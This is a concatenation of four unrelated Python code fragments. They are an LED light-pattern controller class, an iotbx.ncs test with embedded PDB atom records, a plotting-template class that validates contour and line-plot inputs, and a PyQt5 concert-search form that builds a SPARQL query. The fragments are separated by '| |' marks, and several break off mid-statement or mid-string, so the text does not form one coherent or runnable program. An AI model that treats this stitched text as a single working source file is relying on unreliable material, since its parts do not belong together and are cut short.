@colorSequenceCount.setter
def colorSequenceCount(
self,
colorSequenceCount: int,
) -> None:
"""Set the Color sequence count.
Args:
colorSequenceCount: the number of colors in the sequence
"""
self.privateColorSequenceCount = colorSequenceCount
@property
def colorSequenceIndex(
self,
) -> int:
"""The index we are on in the current color sequence.
Returns:
the current index into the color sequence
"""
return self.privateColorSequenceIndex
@colorSequenceIndex.setter
def colorSequenceIndex(
self,
colorSequenceIndex: int,
) -> None:
"""Set the color sequence index.
Args:
colorSequenceIndex: the new index
"""
self.privateColorSequenceIndex = colorSequenceIndex
@property
def colorSequenceNext(
self,
) -> NDArray[(3,), np.int32]:
"""Get the next color in the sequence.
Returns:
the next RGB value
"""
temp = self.colorSequence[self.colorSequenceIndex]
self.colorSequenceIndex += 1
if self.colorSequenceIndex >= self.colorSequenceCount:
self.colorSequenceIndex = 0
if isinstance(temp, Pixel):
return temp.array
else:
return temp
@property
def functionList(self) -> List[LightFunction]:
"""The list of function objects that will be used to modify the light pattern.
Returns:
the list of functions
"""
return self.privateLightFunctions
@property
def overlayDictionary(self) -> Dict[int, Any]:
"""The list of indices and associated colors to temporarily assign LEDs.
Returns:
the dictionary of LEDs and values
"""
return self.privateOverlayDict
def getColorMethodsList(self) -> List[str]:
"""Get the list of methods in this class (by name) that set the color sequence.
Returns:
a list of method name strings
"""
attrs = list(dir(self))
colors = [c for c in attrs if c[:8] == "useColor"]
colors.sort()
return colors
def getFunctionMethodsList(self) -> List[str]:
"""Get the list of methods in this class (by name) that set the color functions.
Returns:
a list of method name strings
"""
attrs = list(dir(self))
functions = [f for f in attrs if f[:11] == "useFunction"]
functions.sort()
return functions
def reset(
self,
) -> None:
"""Reset class variables to default state.
Raises:
SystemExit: if exiting
KeyboardInterrupt: if user quits
LightControlException: if something bad happens
"""
try:
LOGGER.debug("%s.%s:", self.__class__.__name__, self.reset.__name__)
self.privateLightFunctions = []
if self.virtualLEDCount > self.realLEDCount:
self.setVirtualLEDArray(self.virtualLEDArray[: self.realLEDCount])
elif self.virtualLEDCount < self.realLEDCount:
array = LightPatterns.SolidColorArray(arrayLength=self.realLEDCount, color=PixelColors.OFF)
array[: self.virtualLEDCount] = self.virtualLEDArray
self.setVirtualLEDArray(array)
except SystemExit:
raise
except KeyboardInterrupt:
raise
except Exception as ex:
LOGGER.exception(
"%s.%s Exception: %s",
self.__class__.__name__,
self.reset.__name__,
ex,
)
raise LightControlException(str(ex)).with_traceback(ex.__traceback__)
def setVirtualLEDArray(
self,
ledArray: Union[List[Pixel], NDArray[(3, Any), np.int32]],
) -> None:
"""Assign a sequence of pixel data to the LED.
Args:
ledArray: array of RGB values
Raises:
SystemExit: if exiting
KeyboardInterrupt: if user quits
LightControlException: if something bad happens
"""
try:
# make sure the passed LED array is the correct type
if isinstance(ledArray, list):
_ledArray = ConvertPixelArrayToNumpyArray(ledArray)
elif isinstance(ledArray, np.ndarray):
_ledArray = ledArray
else:
_ledArray = SolidColorArray(arrayLength=self.realLEDCount, color=self.backgroundColor)
# check assignment | |
from __future__ import absolute_import, division, print_function
import iotbx.ncs
import iotbx.ncs as ncs
from iotbx import pdb
pdb_str_1="""\
ATOM 1 N GLU A 3 189.385 151.249 151.584 1.00100.71 N
ATOM 2 CA GLU A 3 190.604 152.017 151.807 1.00100.71 C
ATOM 3 C GLU A 3 191.582 151.843 150.650 1.00100.71 C
ATOM 4 O GLU A 3 191.527 150.846 149.929 1.00100.71 O
ATOM 5 CB GLU A 3 191.266 151.602 153.123 1.00 81.32 C
ATOM 6 N LYS A 4 192.471 152.820 150.489 1.00113.71 N
ATOM 7 CA LYS A 4 193.464 152.823 149.414 1.00113.71 C
ATOM 8 C LYS A 4 192.807 152.666 148.045 1.00113.71 C
ATOM 9 O LYS A 4 191.719 153.194 147.810 1.00113.71 O
ATOM 10 CB LYS A 4 194.500 151.716 149.633 1.00 74.77 C
ATOM 11 N ARG A 5 193.479 151.939 147.155 1.00126.03 N
ATOM 12 CA ARG A 5 192.989 151.690 145.800 1.00126.03 C
ATOM 13 C ARG A 5 192.651 152.988 145.072 1.00126.03 C
ATOM 14 O ARG A 5 191.677 153.056 144.321 1.00126.03 O
ATOM 15 CB ARG A 5 191.763 150.772 145.832 1.00 91.24 C
ATOM 16 N LEU A 6 193.465 154.014 145.302 1.00134.86 N
ATOM 17 CA LEU A 6 193.232 155.328 144.718 1.00126.46 C
ATOM 18 C LEU A 6 193.464 155.328 143.211 1.00118.31 C
ATOM 19 O LEU A 6 194.543 154.966 142.738 1.00116.86 O
ATOM 20 CB LEU A 6 194.129 156.372 145.384 1.00128.29 C
ATOM 21 N SER A 7 192.446 155.734 142.460 1.00127.84 N
ATOM 22 CA SER A 7 192.556 155.843 141.011 1.00123.16 C
ATOM 23 C SER A 7 193.118 157.206 140.626 1.00118.42 C
ATOM 24 O SER A 7 192.423 158.219 140.706 1.00104.49 O
ATOM 25 CB SER A 7 191.195 155.625 140.347 1.00121.63 C
ATOM 26 OG SER A 7 190.259 156.601 140.769 1.00106.82 O
ATOM 27 N ALA A 8 194.380 157.227 140.210 1.00118.32 N
ATOM 28 CA ALA A 8 195.053 158.483 139.901 1.00111.32 C
ATOM 29 C ALA A 8 195.632 158.502 138.491 1.00106.60 C
ATOM 30 O ALA A 8 195.140 159.230 137.629 1.00102.40 O
ATOM 31 CB ALA A 8 196.149 158.752 140.922 1.00102.52 C
ATOM 32 N LYS A 9 196.672 157.693 138.277 1.00107.25 N
ATOM 33 CA LYS A 9 197.479 157.673 137.046 1.00101.87 C
ATOM 34 C LYS A 9 197.684 159.066 136.442 1.00 99.64 C
ATOM 35 O LYS A 9 197.682 159.240 135.222 1.00 96.65 O
ATOM 36 CB LYS A 9 196.865 156.721 136.003 1.00116.20 C
ATOM 37 CG LYS A 9 195.479 157.086 135.482 1.00116.20 C
ATOM 38 CD LYS A 9 195.039 156.146 134.370 1.00116.20 C
ATOM 39 CE LYS A 9 194.946 154.712 134.860 1.00116.20 C
ATOM 40 NZ LYS A 9 194.513 153.782 133.781 1.00116.20 N
ATOM 41 N LYS A 10 197.886 160.050 137.313 1.00105.36 N
ATOM 42 CA LYS A 10 198.013 161.443 136.902 1.00 98.00 C
ATOM 43 C LYS A 10 199.366 161.728 136.262 1.00100.41 C
ATOM 44 O LYS A 10 200.353 161.046 136.539 1.00103.97 O
ATOM 45 CB LYS A 10 197.802 162.367 138.102 1.00106.11 C
ATOM 46 CG LYS A 10 198.764 162.114 139.252 1.00113.17 C
ATOM 47 CD LYS A 10 198.481 163.034 140.428 1.00110.08 C
ATOM 48 CE LYS A 10 199.445 162.775 141.574 1.00119.94 C
ATOM 49 NZ LYS A 10 199.358 161.373 142.069 1.00128.24 N
TER
ATOM 50 N GLU B 3 159.932 134.609 151.533 1.00114.47 N
ATOM 51 CA GLU B 3 161.039 133.685 151.754 1.00114.47 C
ATOM 52 C GLU B 3 161.174 132.703 150.594 1.00114.47 C
ATOM 53 O GLU B 3 160.207 132.450 149.874 1.00114.47 O
ATOM 54 CB GLU B 3 160.850 132.926 153.068 1.00 84.70 C
ATOM 55 N LYS B 4 162.377 132.158 150.430 1.00120.40 N
ATOM 56 CA LYS B 4 162.683 131.217 149.354 1.00120.40 C
ATOM 57 C LYS B 4 162.331 131.796 147.986 1.00120.40 C
ATOM 58 O LYS B 4 162.498 132.994 147.754 1.00120.40 O
ATOM 59 CB LYS B 4 161.949 129.891 149.570 1.00 79.41 C
ATOM 60 N ARG B 5 161.843 130.935 147.095 1.00131.79 N
ATOM 61 CA ARG B 5 161.454 131.328 145.741 1.00131.79 C
ATOM 62 C ARG B 5 162.586 132.049 145.013 1.00131.79 C
ATOM 63 O ARG B 5 162.351 132.998 144.265 1.00131.79 O
ATOM 64 CB ARG B 5 160.204 132.212 145.776 1.00 94.80 C
ATOM 65 N LEU B 6 163.811 131.590 145.241 1.00136.38 N
ATOM 66 CA LEU B 6 164.990 132.218 144.659 1.00127.98 C
ATOM 67 C LEU B 6 165.062 131.999 143.151 1.00119.83 C
ATOM 68 O LEU B 6 165.053 130.863 142.677 1.00118.38 O
ATOM 69 CB LEU B 6 166.259 131.684 145.325 1.00129.41 C
ATOM 70 N SER B 7 165.131 133.095 142.403 1.00127.99 N
ATOM 71 CA SER B 7 165.270 133.027 140.954 1.00123.31 C
ATOM 72 C SER B 7 166.741 132.912 140.572 1.00118.57 C
ATOM 73 O SER B 7 167.493 133.882 140.667 1.00104.64 O
ATOM 74 CB SER B 7 164.644 134.257 140.292 1.00117.80 C
ATOM 75 OG SER B 7 165.285 135.447 140.717 1.00102.99 O
ATOM 76 N ALA B 8 167.147 131.722 140.141 1.00124.82 N
ATOM 77 CA ALA B 8 168.549 131.469 139.833 1.00117.82 C
ATOM 78 C ALA B 8 168.746 130.925 138.421 1.00113.10 C
ATOM 79 O ALA B 8 169.288 131.619 137.560 1.00108.90 O
ATOM 80 CB ALA B 8 169.143 130.509 140.852 1.00108.04 C
ATOM 81 N LYS B 9 168.295 129.687 138.206 1.00118.88 N
ATOM 82 CA LYS B 9 168.523 128.914 136.975 1.00113.50 C
ATOM 83 C LYS B 9 169.913 129.148 136.371 1.00111.27 C
ATOM 84 O LYS B 9 170.076 129.209 135.151 1.00108.28 O
ATOM 85 CB LYS B 9 167.429 129.207 135.932 1.00136.65 C
ATOM 86 CG LYS B 9 167.347 130.639 135.415 1.00136.65 C
ATOM 87 CD LYS B 9 166.317 130.771 134.304 1.00136.65 C
ATOM 88 CE LYS B 9 164.925 130.416 134.796 1.00136.65 C
ATOM 89 NZ LYS B 9 163.904 130.545 133.719 1.00136.65 N
ATOM 90 N LYS B 10 170.911 129.255 137.242 1.00117.26 N
ATOM 91 CA LYS B 10 172.276 129.563 136.831 1.00109.90 C
ATOM 92 C LYS B 10 172.964 128.366 136.185 1.00112.31 C
ATOM 93 O LYS B 10 172.620 127.216 136.458 1.00115.87 O
ATOM 94 CB LYS B 10 173.091 130.044 138.033 1.00114.70 C
ATOM 95 CG LYS B 10 173.145 129.047 139.180 1.00121.76 C
ATOM 96 CD LYS B 10 173.936 129.596 140.357 1.00118.67 C
ATOM 97 CE LYS B 10 173.984 128.597 141.501 1.00128.53 C
ATOM 98 NZ LYS B 10 172.623 128.251 141.996 1.00136.83 N
TER
ATOM 99 N GLU C 3 135.020 157.489 151.546 1.00 97.12 N
ATOM 100 CA GLU C 3 134.486 156.151 151.769 1.00 97.12 C
ATOM 101 C GLU C 3 133.592 155.717 150.612 1.00 97.12 C
ATOM 102 O GLU C 3 133.050 156.556 149.891 1.00 97.12 O
ATOM 103 CB GLU C 3 133.707 156.096 153.084 1.00 78.85 C
ATOM 104 N LYS C 4 133.446 154.403 150.449 1.00109.02 N
ATOM 105 CA LYS C 4 132.646 153.820 149.375 1.00109.02 C
ATOM 106 C LYS C 4 133.085 154.333 148.006 1.00109.02 C
ATOM 107 O LYS C 4 134.276 154.544 147.772 1.00109.02 O
ATOM 108 CB LYS C 4 131.157 154.106 149.593 1.00 74.21 C
ATOM 109 N ARG C 5 132.114 154.528 147.117 1.00123.74 N
ATOM 110 CA ARG C 5 132.365 155.018 145.760 1.00123.74 C
ATOM 111 C ARG C 5 133.399 154.165 145.034 1.00123.74 C
ATOM 112 O ARG C 5 134.229 154.680 144.283 1.00123.74 O
ATOM 113 CB ARG C 5 132.819 156.480 145.794 1.00 88.74 C
ATOM 114 N LEU C 6 133.343 152.857 145.263 1.00134.34 N
ATOM 115 CA LEU C 6 134.303 151.929 144.680 1.00125.94 C
ATOM 116 C LEU C 6 134.118 151.794 143.172 1.00117.79 C
ATOM 117 O LEU C 6 133.035 151.448 142.699 1.00116.34 O
ATOM 118 CB LEU C 6 134.187 150.557 145.347 1.00128.27 C
ATOM 119 N SER C 7 135.180 152.070 142.425 1.00122.42 N
ATOM 120 CA SER C 7 135.159 151.916 140.975 1.00117.74 C
ATOM 121 C SER C 7 135.505 150.483 140.593 1.00113.00 C
ATOM 122 O SER C 7 136.662 150.071 140.680 1.00 99.07 O
ATOM 123 CB SER C 7 136.133 152.893 140.314 1.00118.03 C
ATOM 124 OG SER C 7 137.463 152.652 140.736 1.00103.22 O
ATOM 125 N ALA C 8 134.499 149.725 140.169 1.00116.62 N
ATOM | |
results['xlim']: (`left`, `right`), optional
results['ylim']: (`up`, `down`), optional
results['plot_method']: str, optional
'contourf', 'pcolor', 'pcolormesh', or 'plot_surface'
default 'contourf', if 'Z' all zeros, default is 'pcolormesh'
results['plot_method_args']: list, optional
args for *plot_method*, like levels for 'contourf'
results['plot_method_kwargs']: dict, optional
kwargs for *plot_method*,
like cmap for 'plot_surface', default in style
results['clabel_levels']: list, optional
draw contour lines and add labels or not.
The values will be sorted in increasing order.
results['colorbar']: bool, optional
add colorbar or not, default True
results['grid_alpha']: float, optional
transparency of grid, use this when 'grid.alpha' has no effect
results['plot_surface_shadow']: list, optional
add contourf in a surface plot, ['x', 'y', 'z'], default []
'''
if not ('X' in results
and 'Y' in results and 'Z' in results):
vlog.error("`X`, 'Y' and `Z` are required!")
return [], []
for _x in ['X', 'Y', 'Z']:
if not isinstance(results[_x], numpy.ndarray):
vlog.error("`%s` array must be numpy.ndarray!" % _x)
return [], []
X = results['X']
Y = results['Y']
Z = results['Z']
if len(X.shape) == 1 and len(Y.shape) == 1:
# X, Y: 1 dimension
if (len(Y), len(X)) != Z.shape:
vlog.error("Invalid `X`, `Y` length or `Z` shape! (%d,%d)!=%s"
% (len(Y), len(X), Z.shape))
return [], []
X, Y = numpy.meshgrid(X, Y)
elif len(X.shape) == 2 and len(Y.shape) == 2:
# X, Y: 2 dimension
if not (X.shape == Y.shape == Z.shape):
vlog.error("Invalid `X`, `Y` or `Z` shape!")
return [], []
else:
vlog.error("Invalid `X`, `Y` dimension!")
return [], []
title, xlabel, ylabel, aspect = self._get_my_optional_vals(
results, ('title', str, None), ('xlabel', str, None),
('ylabel', str, None), ('aspect', str, None))
xlim, ylim = self._get_my_points(results, 'xlim', 'ylim')
plot_method, plot_method_args, plot_method_kwargs, \
clabel_levels, colorbar, grid_alpha, plot_surface_shadow = \
self._get_my_optional_vals(results,
('plot_method', str, 'contourf'),
('plot_method_args', list, []),
('plot_method_kwargs', dict, {}),
('clabel_levels', list, []),
('colorbar', bool, True),
('grid_alpha', float, None),
('plot_surface_shadow', list, []))
if plot_method not in ('contourf', 'pcolor', 'pcolormesh',
'plot_surface'):
plot_method = 'contourf'
if plot_method == 'contourf' and not Z.any():
# all zeros
vlog.warning("All elements are 0, use plot_method pcolormesh!")
plot_method = 'pcolormesh'
if clabel_levels:
clabel_levels = sorted(clabel_levels)
plot_surface_shadow = list(filter(
lambda x: True if x in ['x', 'y', 'z'] else False,
plot_surface_shadow))
vlog.debug("Some template contourf parameters: %s" % [
plot_method, plot_method_args, plot_method_kwargs,
colorbar, grid_alpha, plot_surface_shadow])
return self._tmpl_contourf(
X, Y, Z, title, xlabel, ylabel, aspect, xlim, ylim,
plot_method, plot_method_args, plot_method_kwargs,
clabel_levels, colorbar, grid_alpha, plot_surface_shadow)
def _tmpl_contourf(
self, X, Y, Z, title, xlabel, ylabel, aspect, xlim, ylim,
plot_method, plot_method_args, plot_method_kwargs,
clabel_levels, colorbar, grid_alpha, plot_surface_shadow):
'''For :meth:`tmpl_contourf`.'''
raise NotImplementedError()
def tmpl_line(self, results):
'''
Template
--------
.. code::
title
+--------+
ylabel | Line2D |
+--------+
xlabel
or
title
/|\
/ | \
/ | \
| / \ |
| / \ | zlabel
|/ Line \|
\ 3D /
xlabel \ / ylabel
\ /
Parameters
----------
results['LINE']: list of tuple, required
all line info for the axes
2D example [(x1, y1, label1), (x2, y2, label2), (x3, y3)]
3D example [(x1, y1, z1, label1), (x2, y2, z2)]
'x1', 'y1', 'z1', list or numpy.ndarray, same length
results['title']: str, optional
results['xlabel']: str, optional
results['ylabel']: str, optional
results['aspect']: str, optional
results['lin3d']: bool, optional for 3D, default False
results['zlabel']: str, optional for 3D
results['scale_xyz']: tuple, optional for 3D
like ([-1,1], [-1,1], [-1,1])
results['xlim']: (`left`, `right`), optional
results['ylim']: (`up`, `down`), optional
results['ylabel_rotation']: str or int, optional
results['legend_kwargs']: dict, optional
legend kwargs
'''
if not 'LINE' in results:
vlog.error("`LINE` are required!")
return [], []
if not isinstance(results['LINE'], list):
vlog.error("`LINE` array must be list!")
return [], []
if results.get('lin3d', False):
lin3d, d3, d3n = True, 1, [(2, 'Z')]
else:
lin3d, d3, d3n = False, 0, []
for i, line in enumerate(results['LINE'], 1):
if len(line) in (2+d3, 3+d3):
for _x, _X in [(0, 'X'), (1, 'Y')] + d3n:
if not isinstance(line[_x], (list, range, numpy.ndarray)):
vlog.error("%s of line %d must be array!" % (_X, i))
return [], []
if len(line[0]) != len(line[1]):
vlog.error("Invalid length of x, y for line %d! %d!=%d"
% (i, len(line[0]), len(line[1])))
return [], []
if d3 and len(line[0]) != len(line[2]):
vlog.error("Invalid length of x, z for line %d! %d!=%d"
% (i, len(line[0]), len(line[2])))
return [], []
else:
vlog.error("Length of info for line %d must be %d or %d!"
% (i, 2+d3, 3+d3))
return [], []
LINE = results['LINE']
title, xlabel, ylabel, aspect = self._get_my_optional_vals(
results, ('title', str, None), ('xlabel', str, None),
('ylabel', str, None), ('aspect', str, None))
zlabel, scale_xyz = self._get_my_optional_vals(
results, ('zlabel', str, None), ('scale_xyz', tuple, None))
xlim, ylim = self._get_my_points(results, 'xlim', 'ylim')
ylabel_rotation, legend_kwargs = self._get_my_optional_vals(
results, ('ylabel_rotation', (int, str), None),
('legend_kwargs', dict, {}))
return self._tmpl_line(
LINE, title, xlabel, ylabel, aspect,
lin3d, zlabel, scale_xyz,
xlim, ylim, ylabel_rotation, legend_kwargs)
def _tmpl_line(self, LINE, title, xlabel, ylabel, aspect,
lin3d, zlabel, scale_xyz,
xlim, ylim, ylabel_rotation, legend_kwargs):
'''For :meth:`tmpl_line`.'''
raise NotImplementedError()
def tmpl_sharextwinx(self, results):
'''
Template
--------
.. code::
title
+--------+
ylabel | axes 1 | ylabel
+--------+
ylabel | axes 2 | ylabel
+--------+
xlabel
Parameters
----------
results['X']: list or numpy.ndarray, required
1 dimension array
results['YINFO']: list of dict, required
all info for the axes
results['hspace']: float, optional
height space between subplots, default 0.02
results['title']: str, optional
default None
results['xlabel']: str, optional
default None
results['xlim']: (`left`, `right`), optional
default [min(X), max(X)]
results['ylabel_rotation']: str or int, optional
default 'vertical'
Notes
-----
Form of *YINFO*.
.. code:: python
YINFO = [{
# axes 1
'left': [(ydata1,), (ydata2, label2)], # required
'right': [(xdata3, ydata3), (xdata4, ydata4, label4)],
'llegend': dict(loc='upper left'), # optional
'rlegend': dict(loc='upper right'), # optional
'lylabel': 'left ylabel', # optional
'rylabel': 'right ylabel', # optional
}, {
# axes 2
'left': [([1,...,9], 'line')], 'right': [], # required
'lylabel': 'Y2',
}]
yinfo[0]['left'][0]: len(ydata1) == len(X)
yinfo[1]['right']: can be empty list
yinfo[0]['llegend']: optional kwargs for legend
'''
# check
if not ('X' in results and 'YINFO' in results):
vlog.error("`X` and `YINFO` are required!")
return [], []
if isinstance(results['X'], (list, range, numpy.ndarray)):
X = results['X']
else:
vlog.error("`X` must be array!")
return [], []
if not isinstance(results['YINFO'], list):
vlog.error("`YINFO` array must be list!")
return [], []
for i, ax in enumerate(results['YINFO'], 1):
if not (isinstance(ax, dict) and 'left' in ax and 'right' in ax):
vlog.error("Info of axes %d must be dict!"
"Key 'left', 'right' must in it!" % i)
return [], []
for lr in ['left', 'right']:
for j, line in enumerate(ax[lr], 1):
if not isinstance(line[0], (list, range, numpy.ndarray)):
vlog.error(
"Line %d (0y/0x) in axes %d %s must be array!"
% (j, i, lr))
return [], []
if (len(line) == 2 and isinstance(line[1], str)
and len(line[0]) != len(X)):
vlog.error(
"Invalid len of line%d(0y) in axes %d %s! %d!=%d"
% (j, i, lr, len(line[0]), len(X)))
return [], []
if (len(line) >= 2 and isinstance(line[1], (list, range, numpy.ndarray))
and len(line[0]) != len(line[1])):
vlog.error(
"Invalid len of line%d(0x,1y) in axes %d %s! %d!=%d"
% (j, i, lr, len(line[0]), len(line[1])))
return [], []
YINFO = results['YINFO']
hspace, title, xlabel, ylabel_rotation = self._get_my_optional_vals(
results, ('hspace', float, 0.02), ('title', str, None),
('xlabel', str, None), ('ylabel_rotation', (int, str), 'vertical')
)
xlim, = self._get_my_points(results, 'xlim')
if not xlim:
xlim = [numpy.min(X), numpy.max(X)]
return self._tmpl_sharextwinx(
X, YINFO,
hspace, title, xlabel, xlim, ylabel_rotation)
def _tmpl_sharextwinx(
self, X, YINFO,
hspace, title, xlabel, xlim, ylabel_rotation):
'''For :meth:`tmpl_sharextwinx`.'''
raise NotImplementedError()
def tmpl_z111p(self, results):
'''
Zip axes from other templates that return only one axes.
Parameters
----------
results['zip_results']: list of tuple, required
[(name1, pos1, results1), (name2, pos2, results2)]
name1: template's name in :attr:`template_available`
pos1: new position, int 221, or [a,b,c,d] etc
results1: results for template name1
results['suptitle']: str, optional
Notes
-----
1. All *add_style* from other templates are ignored!
2. If axes use same *pos*, results data will be merged(append),
layout only use first one.
'''
if not 'zip_results' in results:
vlog.error("`zip_results` are required!")
return [], []
if not isinstance(results['zip_results'], list):
vlog.error("`zip_results` must be list!")
return [], []
zip_results = []
for i, _results in enumerate(results['zip_results'], 0):
if len(_results) != 3:
vlog.error("`zip_results[%d]`: invalid length!=3!" % i)
continue
temp, pos, _res = _results
try:
template_method = getattr(self, temp)
except AttributeError:
vlog.error("`zip_results[%d]`: | |
from PyQt5 import QtCore, QtWidgets, QtGui
from PyQt5.QtWebEngineWidgets import QWebEngineView
import application
import cache
import view
from math import sin, cos, sqrt, atan2, radians
import graph
import view
import time
import traceback
import sys
class searchForm():
"""
Initializes an instance of the search form, which contains the search and results tabs.
"""
def __init__(self, app, parent=None):
"""
Create an instance of the search form class.
Parameters
----------
app : instance
Reference to the main application module.
"""
# Store reference to main-level tab
self.app = app
self.topLevelTab = app.searchTab
self.topLevelSearchLayout = QtWidgets.QHBoxLayout()
self.leftSide = self.generate_left_side()
self.rightSide = self.generate_right_side()
self.topLevelSearchLayout.addWidget(self.leftSide)
self.topLevelSearchLayout.addWidget(self.rightSide)
# Set spanning between left / right sides of top-level layout
self.topLevelSearchLayout.setStretch(0, 2)
self.topLevelSearchLayout.setStretch(1, 8)
# Set auto-completes
self.artistFilter.setCompleter(self.app.auto_comp(self.app.cache.load('artistList')))
self.genreFilter.setCompleter(self.app.auto_comp(self.app.cache.load('genreList')))
self.locationFilter.setCompleter(self.app.auto_comp(self.app.cache.load('newReversedGroupedLocations')))
self.countryFilter.setCompleter(self.app.auto_comp(self.app.cache.load('countries')))
# Set layout
self.topLevelTab.setLayout(self.topLevelSearchLayout)
def generate_left_side(self):
"""
Generates the left side of the search form (not the data views, but the search form, results tab
and all widgets held within.
"""
# Create our search form
self.searchFormVerticalWidget = QtWidgets.QWidget(self.app.searchTab)
self.searchFormVerticalLayout = QtWidgets.QVBoxLayout(self.searchFormVerticalWidget)
self.searchFormVerticalLayout.addWidget(self.generate_search_tab())
self.searchBtn = QtWidgets.QPushButton('Perform Search')
self.searchFormVerticalLayout.addWidget(self.searchBtn)
# self.searchBtn.clicked.connect(self.search_button_clicked)
self.searchFormVerticalWidget.setLayout(self.searchFormVerticalLayout)
# Create our results side?
self.resultsFormVerticalWidget = QtWidgets.QWidget(self.app.searchTab)
self.resultsFormVerticalLayout = QtWidgets.QVBoxLayout(self.resultsFormVerticalWidget)
self.resultsFormVerticalLayout.addWidget(self.create_results_view())
# Wrap this within our left-side tab interface for swapping between results, and the search form
self.leftSideWidget = QtWidgets.QTabWidget(self.app.searchTab)
self.leftSideWidget.setTabPosition(2)
self.leftSideWidget.addTab(self.searchFormVerticalWidget, 'Search Form')
self.leftSideWidget.addTab(self.resultsFormVerticalWidget, 'Results')
# self.leftSideWidget.setTabEnabled(1, False)
# Signal for performing a search
self.searchBtn.clicked.connect(self.app.searchHandler.perform_search)
return self.leftSideWidget
def generate_on_this_day(self):
"""
Generates a default view (shown during start-up), of the performance on this day / months
in history.
"""
q = """
PREFIX etree:<http://etree.linkedmusic.org/vocab/>
PREFIX mo:<http://purl.org/ontology/mo/>
PREFIX event:<http://purl.org/NET/c4dm/event.owl#>
PREFIX skos:<http://www.w3.org/2004/02/skos/core#>
PREFIX rdf:<http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX calma: <http://calma.linkedmusic.org/vocab/>
SELECT DISTINCT ?label ?name ?place ?location ?date (group_concat(distinct ?calma; separator = "\\n") AS ?calma) WHERE {{
?art skos:prefLabel ?label.
?art mo:performer ?performer.
?art etree:description ?description.
?performer foaf:name ?name.
?art event:place ?location.
?art etree:date ?date.
?location etree:location ?place.
?art event:hasSubEvent ?subEvent
OPTIONAL {{?performer etree:mbTag ?genre}}.
OPTIONAL {{?subEvent calma:data ?calma}}.
FILTER (regex(?date,'{0}', 'i'))
}}
ORDER BY ?name
LIMIT 25
""".format(time.strftime('-%m-%d'))
results = self.app.sparql.execute_string(q)
self.app.searchHandler.setup_views(['map', 'table', 'timeline', 'today in history'], results)
self.app.searchHandler.lastQueryExecuted = q
def generate_right_side(self):
"""
Generates the right side of the search form (data views).
"""
self.rightSideWidget = QtWidgets.QWidget(self.app.searchTab)
self.rightSideLayout = QtWidgets.QVBoxLayout()
return self.rightSideWidget
def generate_search_tab(self):
self.searchFormTabs = QtWidgets.QTabWidget()
self.searchFormTabs.addTab(self.generate_search_form_general(), 'General')
self.searchFormTabs.addTab(self.generate_search_form_geography(), 'Geography')
self.searchFormTabs.addTab(self.generate_search_form_advanced(), 'Advanced')
self.searchFormTabs.addTab(self.generate_search_form_views(), 'Views')
return self.searchFormTabs
def generate_search_form_general(self):
# Create layout and widget to place contents in
self.searchGeneralLayout = QtWidgets.QGridLayout()
self.searchGeneralWidget = QtWidgets.QWidget(self.app.searchTab)
# Artist field
self.artistFilterLbl = QtWidgets.QLabel('Artist')
self.artistFilter = QtWidgets.QLineEdit()
self.searchGeneralLayout.addWidget(self.artistFilterLbl, 0, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.artistFilter, 0, 3, 1, 1)
# Genre field
self.genreFilterLbl = QtWidgets.QLabel('Genre')
self.genreFilter = QtWidgets.QLineEdit()
self.searchGeneralLayout.addWidget(self.genreFilterLbl, 1, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.genreFilter, 1, 3, 1, 1)
# Track name field
self.trackNameLbl = QtWidgets.QLabel('Track Name')
self.trackNameFilter = QtWidgets.QLineEdit()
self.searchGeneralLayout.addWidget(self.trackNameLbl, 2, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.trackNameFilter, 2, 3, 1, 1)
# Start date field
self.dateFromLbl = QtWidgets.QLabel('From Date')
self.dateFrom = QtWidgets.QDateEdit()
self.dateFrom.setDisplayFormat('dd-MM-yyyy')
self.dateFrom.setDateTime(QtCore.QDateTime(QtCore.QDate(1950, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateFrom.setMaximumDate(QtCore.QDate(2016, 1, 1))
self.searchGeneralLayout.addWidget(self.dateFromLbl, 3, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.dateFrom, 3, 3, 1, 1)
# End date field
self.dateToLbl = QtWidgets.QLabel('To Date')
self.dateTo = QtWidgets.QDateEdit()
self.dateTo.setDisplayFormat('dd-MM-yyyy')
self.dateTo.setDateTime(QtCore.QDateTime(QtCore.QDate(2017, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateTo.setMaximumDate(QtCore.QDate(2017, 1, 1))
self.searchGeneralLayout.addWidget(self.dateToLbl, 4, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.dateTo, 4, 3, 1, 1)
# # Order-by field
self.orderByLbl = QtWidgets.QLabel('Order By')
self.orderByFilter = QtWidgets.QComboBox()
self.orderByFilter.addItem('Artist')
self.orderByFilter.addItem('Date')
self.orderByFilter.addItem('Genre')
self.orderByFilter.addItem('Label')
self.orderByFilter.addItem('Location')
self.searchGeneralLayout.addWidget(self.orderByLbl, 5, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.orderByFilter, 5, 3, 1, 1)
# Num results field
self.numResultsLbl = QtWidgets.QLabel('No. Results')
self.numResultsSpinbox = QtWidgets.QSpinBox()
self.numResultsSpinbox.setMaximum(10000)
self.numResultsSpinbox.setProperty("value", 500)
self.searchGeneralLayout.addWidget(self.numResultsLbl, 6, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.numResultsSpinbox, 6, 3, 1, 1)
# CALMA-available only field
self.hasCalmaLbl = QtWidgets.QLabel('Has CALMA')
self.hasCalmaCheck = QtWidgets.QCheckBox()
self.searchGeneralLayout.addWidget(self.hasCalmaLbl, 7, 1, 1, 1)
self.searchGeneralLayout.addWidget(self.hasCalmaCheck, 7, 3, 1, 1)
# Set layout to widget
self.searchGeneralWidget.setLayout(self.searchGeneralLayout)
# Return widget
return self.searchGeneralWidget
def generate_search_form_geography(self):
# Create layout and widget to place contents in
self.searchGeographyLayout = QtWidgets.QGridLayout()
self.searchGeographyWidget = QtWidgets.QWidget()
# Venue field
self.venueFilterLbl = QtWidgets.QLabel('Venue')
self.venueFilter = QtWidgets.QLineEdit()
self.searchGeographyLayout.addWidget(self.venueFilterLbl, 0, 1, 1, 1)
self.searchGeographyLayout.addWidget(self.venueFilter, 0, 3, 1, 1)
# Location field
self.locationFilterLbl = QtWidgets.QLabel('Location')
self.locationFilter = QtWidgets.QLineEdit()
self.searchGeographyLayout.addWidget(self.locationFilterLbl, 1, 1, 1, 1)
self.searchGeographyLayout.addWidget(self.locationFilter, 1, 3, 1, 1)
# Range field
